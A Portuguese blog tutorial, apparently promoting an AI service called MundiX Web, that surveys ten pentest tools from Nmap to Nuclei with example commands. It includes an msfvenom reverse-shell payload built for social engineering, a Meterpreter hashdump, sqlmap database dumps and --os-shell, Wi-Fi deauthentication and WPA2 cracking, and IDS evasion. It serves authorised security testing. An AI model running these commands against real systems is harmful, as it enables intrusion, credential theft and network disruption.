Top 10 Ferramentas de Pentest que Todo Profissional Deve Conhecer
No universo do teste de penetração, suas ferramentas são tão importantes quanto seu conhecimento. Dominar as ferramentas certas pode ser a diferença entre uma avaliação de segurança superficial e uma análise profunda que revela vulnerabilidades críticas. Neste guia, apresentamos as 10 ferramentas que todo pentester deve conhecer, com exemplos práticos de comandos e cenários de uso reais.
Visão Geral Rápida
| # | Ferramenta | Categoria | Licença | Nível |
|---|---|---|---|---|
| 1 | Nmap | Scanner de rede | Open Source | Todos |
| 2 | Burp Suite | Teste web | Freemium | Intermediário |
| 3 | Metasploit | Exploração | Open Source | Avançado |
| 4 | SQLMap | Injeção SQL | Open Source | Intermediário |
| 5 | Wireshark | Análise de rede | Open Source | Todos |
| 6 | Gobuster | Enumeração web | Open Source | Iniciante |
| 7 | Nikto | Scanner web | Open Source | Iniciante |
| 8 | John/Hashcat | Quebra de senhas | Open Source | Intermediário |
| 9 | Aircrack-ng | Redes sem fio | Open Source | Avançado |
| 10 | Nuclei | Scanner moderno | Open Source | Todos |
1. Nmap (Network Mapper)
O que faz: Scanner de rede e portas considerado o canivete suíço do pentester. Permite descobrir hosts ativos, portas abertas, serviços em execução, versões de software e até o sistema operacional do alvo.
Quando usar: Na fase de reconhecimento e varredura. Geralmente é a primeira ferramenta executada em qualquer pentest.
Comandos Essenciais
bash# Scan rápido das 1000 portas mais comuns nmap -sV alvo.com.br # Scan completo de todas as portas com detecção de OS nmap -A -T4 -p- alvo.com.br # Scan silencioso (SYN scan) para evitar detecção nmap -sS -Pn -T2 alvo.com.br # Scan de vulnerabilidades usando scripts NSE nmap --script vuln -p 80,443,8080 alvo.com.br # Scan de uma rede inteira com saída em XML nmap -sn 192.168.1.0/24 -oX rede_scan.xml # Enumeração de serviços SMB nmap --script smb-enum-shares,smb-enum-users -p 445 alvo.com.br
Prós: Extremamente versátil, comunidade ativa, scripts extensíveis (NSE), gratuito e open source. Contras: Scans completos podem ser lentos; pode ser detectado por IDS/IPS sem configuração adequada.
2. Burp Suite
O que faz: Plataforma integrada para teste de segurança de aplicações web. Funciona como proxy interceptador, permitindo capturar, analisar e modificar requisições HTTP/HTTPS entre o navegador e o servidor.
Quando usar: Em qualquer teste de aplicações web, desde autenticação até injeções e falhas de lógica de negócio.
Funcionalidades Principais
- Proxy: intercepta e modifica requisições em tempo real
- Scanner: (versão Pro) identifica vulnerabilidades automaticamente
- Repeater: reenvia requisições modificadas para teste manual
- Intruder: automatiza ataques como brute force e fuzzing
- Decoder: codifica/decodifica dados em múltiplos formatos
- Comparer: compara respostas para identificar diferenças sutis
bash# Configuração do proxy no terminal (para ferramentas CLI) export http_proxy=http://127.0.0.1:8080 export https_proxy=http://127.0.0.1:8080 # Teste de requisição via curl passando pelo Burp curl -x http://127.0.0.1:8080 -k https://alvo.com.br/api/login \ -H "Content-Type: application/json" \ -d '{"username":"admin","password":"teste123"}'
Prós: Interface intuitiva, scanner potente (Pro), extensível com plugins, padrão da indústria. Contras: Versão Community limitada, licença Pro custosa, consome bastante memória.
3. Metasploit Framework
O que faz: Framework de exploração de vulnerabilidades mais popular do mundo. Contém milhares de exploits, payloads, encoders e módulos auxiliares para testar a segurança de sistemas.
Quando usar: Na fase de exploração, para comprovar vulnerabilidades e demonstrar impacto real.
Comandos Essenciais
bash# Iniciar o Metasploit msfconsole # Buscar exploits para um serviço msf6> search type:exploit platform:linux apache # Configurar e executar um exploit msf6> use exploit/multi/http/apache_normalize_path_rce msf6> set RHOSTS alvo.com.br msf6> set RPORT 443 msf6> set SSL true msf6> exploit # Gerar payload para testes de engenharia social msfvenom -p windows/x64/meterpreter/reverse_tcp \ LHOST=10.10.10.1 LPORT=4444 -f exe > payload.exe # Pós-exploração com Meterpreter meterpreter> sysinfo meterpreter> getuid meterpreter> hashdump
Prós: Maior base de exploits, comunidade gigante, integração com outras ferramentas, gratuito (Community). Contras: Curva de aprendizado íngreme, pode ser detectado por antivírus, versão Pro é cara.
4. SQLMap
O que faz: Ferramenta automatizada para detecção e exploração de vulnerabilidades de injeção SQL. Suporta todos os principais bancos de dados (MySQL, PostgreSQL, Oracle, MSSQL, SQLite).
Quando usar: Quando suspeitar de SQL Injection em aplicações web.
Comandos Essenciais
bash# Teste básico de SQL Injection sqlmap -u "https://alvo.com.br/busca?q=teste" --batch # Teste com cookie de sessão autenticada sqlmap -u "https://alvo.com.br/perfil?id=1" \ --cookie="PHPSESSID=abc123" --batch # Enumerar bancos de dados sqlmap -u "https://alvo.com.br/busca?q=teste" --dbs --batch # Extrair tabelas de um banco específico sqlmap -u "https://alvo.com.br/busca?q=teste" \ -D nome_banco --tables --batch # Dump de dados de uma tabela sqlmap -u "https://alvo.com.br/busca?q=teste" \ -D nome_banco -T usuarios --dump --batch # Teste via requisição POST salva do Burp sqlmap -r requisicao_burp.txt --batch --level=3 --risk=2 # Tentativa de obter shell no servidor sqlmap -u "https://alvo.com.br/busca?q=teste" --os-shell --batch
Prós: Automatização completa, suporta múltiplos bancos, técnicas avançadas de bypass de WAF. Contras: Pode ser ruidoso (muitas requisições), WAFs modernos podem bloquear.
5. Wireshark
O que faz: Analisador de protocolos de rede que captura e inspeciona pacotes em tempo real. Permite analisar tráfego em profundidade, identificar comunicações suspeitas e entender o comportamento da rede.
Quando usar: Na análise de tráfego de rede, debugging de comunicações, identificação de dados em texto claro e análise forense.
Filtros Essenciais
bash# Captura de pacotes via terminal com tshark tshark -i eth0 -w captura.pcap -c 10000 # Filtrar tráfego HTTP tshark -r captura.pcap -Y "http" -T fields \ -e ip.src -e http.host -e http.request.uri # Encontrar credenciais em texto claro tshark -r captura.pcap -Y "http.request.method == POST" \ -T fields -e http.file_data # Filtrar por IP específico tshark -r captura.pcap -Y "ip.addr == 192.168.1.100" # Detectar consultas DNS suspeitas tshark -r captura.pcap -Y "dns.qry.name contains alvo"
Prós: Análise granular de pacotes, suporte a centenas de protocolos, gratuito, interface gráfica rica. Contras: Complexo para iniciantes, captura de alto volume gera arquivos grandes.
6. Gobuster / Dirb
O que faz: Ferramentas de enumeração de diretórios e arquivos ocultos em servidores web. Utilizam wordlists para descobrir caminhos que não são linkados publicamente.
Quando usar: Na fase de reconhecimento web, para encontrar painéis administrativos, backups, APIs ocultas e arquivos sensíveis.
Comandos Essenciais
bash# Enumeração de diretórios com Gobuster gobuster dir -u https://alvo.com.br \ -w /usr/share/wordlists/dirb/common.txt \ -t 50 -o resultado_dirs.txt # Enumeração de subdomínios gobuster dns -d alvo.com.br \ -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ -t 50 # Enumeração com extensões específicas gobuster dir -u https://alvo.com.br \ -w /usr/share/wordlists/dirb/common.txt \ -x php,txt,bak,sql,zip,old -t 30 # Enumeração de virtual hosts gobuster vhost -u https://alvo.com.br \ -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt # Alternativa mais simples com Dirb dirb https://alvo.com.br /usr/share/wordlists/dirb/common.txt
Prós: Rápido, suporta múltiplos modos (dir, dns, vhost), altamente configurável. Contras: Dependente da qualidade da wordlist, pode ser bloqueado por rate limiting.
7. Nikto
O que faz: Scanner de vulnerabilidades em servidores web. Verifica mais de 7.000 itens potencialmente perigosos, incluindo versões desatualizadas, arquivos de configuração expostos e falhas conhecidas.
Quando usar: Como scan inicial de servidores web para identificar configurações incorretas e vulnerabilidades conhecidas rapidamente.
Comandos Essenciais
bash# Scan básico nikto -h https://alvo.com.br # Scan com autenticação básica nikto -h https://alvo.com.br -id admin:senha123 # Scan de porta específica com SSL nikto -h alvo.com.br -p 8443 -ssl # Scan via proxy (Burp Suite) nikto -h https://alvo.com.br -useproxy http://127.0.0.1:8080 # Salvar resultado em HTML nikto -h https://alvo.com.br -Format htm -o resultado_nikto.html # Scan com evasão básica de IDS nikto -h https://alvo.com.br -evasion 1
Prós: Fácil de usar, banco de dados extenso de verificações, integração com outros scanners, gratuito. Contras: Muito ruidoso (facilmente detectável), pode gerar muitos falsos positivos, lento em comparação com alternativas modernas.
8. John the Ripper e Hashcat
O que fazem: Ferramentas de quebra de senhas. John the Ripper é versátil e suporta centenas de formatos de hash. Hashcat utiliza GPU para acelerar drasticamente a quebra.
Quando usar: Na pós-exploração, ao encontrar hashes de senhas que precisam ser quebrados para demonstrar impacto.
Comandos Essenciais
bash# John the Ripper - crack de hashes Linux john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt # John - identificar tipo de hash automaticamente john --format=auto hashes.txt # John - mostrar senhas quebradas john --show hashes.txt # Hashcat - crack com GPU (MD5) hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt # Hashcat - crack NTLM com regras hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt -r rules/best64.rule # Hashcat - ataque de máscara (brute force inteligente) hashcat -m 0 -a 3 hashes.txt '?u?l?l?l?d?d?d?s' # Identificar tipo de hash com hashid hashid '5f4dcc3b5aa765d61d8327deb882cf99'
Prós (John): Multiplataforma, suporta centenas de formatos, eficiente em CPU. Prós (Hashcat): Velocidade absurda com GPU, regras avançadas, suporte a clusters. Contras: Requer hardware potente para hashes fortes; wordlists grandes ocupam espaço significativo.
9. Aircrack-ng
O que faz: Suite completa para auditoria de redes sem fio. Inclui ferramentas para captura de pacotes, ataque a WEP/WPA/WPA2 e teste de segurança de redes Wi-Fi.
Quando usar: Em testes de segurança de redes sem fio, avaliação de configurações Wi-Fi e demonstração de vulnerabilidades em protocolos wireless.
Comandos Essenciais
bash# Colocar interface em modo monitor airmon-ng start wlan0 # Capturar pacotes de redes próximas airodump-ng wlan0mon # Capturar handshake de uma rede específica airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon # Forçar desautenticação para capturar handshake aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon # Quebrar senha WPA2 com wordlist aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap # Scan passivo de redes em todas as bandas airodump-ng --band abg wlan0mon
Prós: Suite completa para wireless, amplamente documentado, gratuito, suporta múltiplos tipos de ataque. Contras: Requer adaptador Wi-Fi compatível com modo monitor; WPA3 é significativamente mais resistente.
10. Nuclei
O que faz: Scanner de vulnerabilidades moderno e rápido, baseado em templates YAML. Permite criar verificações personalizadas e compartilhar com a comunidade. Tornou-se uma das ferramentas mais populares nos últimos anos.
Quando usar: Em qualquer fase do pentest para verificações automatizadas. Especialmente poderoso para scan em larga escala e integração em pipelines de CI/CD.
Comandos Essenciais
bash# Scan básico com todos os templates nuclei -u https://alvo.com.br # Scan com templates de severidade específica nuclei -u https://alvo.com.br -severity critical,high # Scan de múltiplos alvos nuclei -l alvos.txt -severity critical,high -o resultados.txt # Scan com templates específicos nuclei -u https://alvo.com.br -t cves/ -t misconfigurations/ # Atualizar templates da comunidade nuclei -update-templates # Scan com rate limiting para evitar bloqueio nuclei -u https://alvo.com.br -rate-limit 10 -concurrency 5 # Criar e usar template personalizado nuclei -u https://alvo.com.br -t meus_templates/
Prós: Extremamente rápido, templates da comunidade atualizados constantemente, fácil de personalizar, integração com CI/CD. Contras: Falsos positivos em alguns templates da comunidade; requer curadoria de templates para resultados consistentes.
Como a IA Potencializa o Uso Dessas Ferramentas
Mesmo dominando todas as ferramentas acima, o pentester moderno pode se beneficiar enormemente de assistentes de IA. A plataforma MundiX Web, por exemplo, ajuda profissionais a:
- Gerar comandos contextualizados: descreva seu cenário e receba o comando exato para cada ferramenta
- Interpretar resultados: cole a saída de um Nmap scan ou SQLMap e receba uma análise detalhada
- Encadear ferramentas: receba sugestões de qual ferramenta usar em seguida com base nos resultados
- Aprender na prática: entenda o que cada flag e parâmetro faz enquanto executa seus testes
Dicas para Maximizar Suas Ferramentas
1. Automatize Pipelines
Combine ferramentas em scripts para automatizar fluxos completos:
bash#!/bin/bash # Pipeline básico de reconhecimento ALVO=$1 echo "[*] Iniciando reconhecimento de $ALVO" # Fase 1: Scan de portas echo "[*] Executando Nmap..." nmap -sV -sC -oN nmap_resultado.txt $ALVO # Fase 2: Enumeração web (se porta 80/443 aberta) echo "[*] Executando Gobuster..." gobuster dir -u https://$ALVO -w /usr/share/wordlists/dirb/common.txt \ -o gobuster_resultado.txt -q # Fase 3: Scan de vulnerabilidades web echo "[*] Executando Nikto..." nikto -h https://$ALVO -o nikto_resultado.html -Format htm # Fase 4: Nuclei para vulnerabilidades conhecidas echo "[*] Executando Nuclei..." nuclei -u https://$ALVO -severity critical,high -o nuclei_resultado.txt echo "[+] Reconhecimento completo. Verifique os arquivos de saída."
2. Mantenha Tudo Atualizado
bash# Atualizar Nuclei e templates nuclei -update && nuclei -update-templates # Atualizar Metasploit msfupdate # Atualizar banco de dados do Nikto nikto -update
3. Documente Tudo
Registre cada comando executado e seu resultado. Isso facilita a elaboração do relatório final e garante reprodutibilidade dos achados.
Conclusão
Dominar essas 10 ferramentas fornece uma base sólida para qualquer profissional de pentest. Lembre-se que ferramentas são meios, não fins: o verdadeiro diferencial de um pentester está na capacidade de pensar como um atacante, entender o contexto de negócio e comunicar riscos de forma clara.
Comece pelas ferramentas mais simples (Nmap, Gobuster, Nikto), evolua para as mais complexas (Metasploit, Burp Suite) e nunca pare de praticar em ambientes controlados como HackTheBox e TryHackMe.
Comece Agora com MundiX
Não sabe qual comando usar? O MundiX Web gera comandos personalizados para todas essas ferramentas com base no seu cenário de teste. Descreva seu alvo e objetivo, e receba orientações passo a passo.
Acesse o MundiX Web e transforme seu workflow de pentest com o poder da inteligência artificial.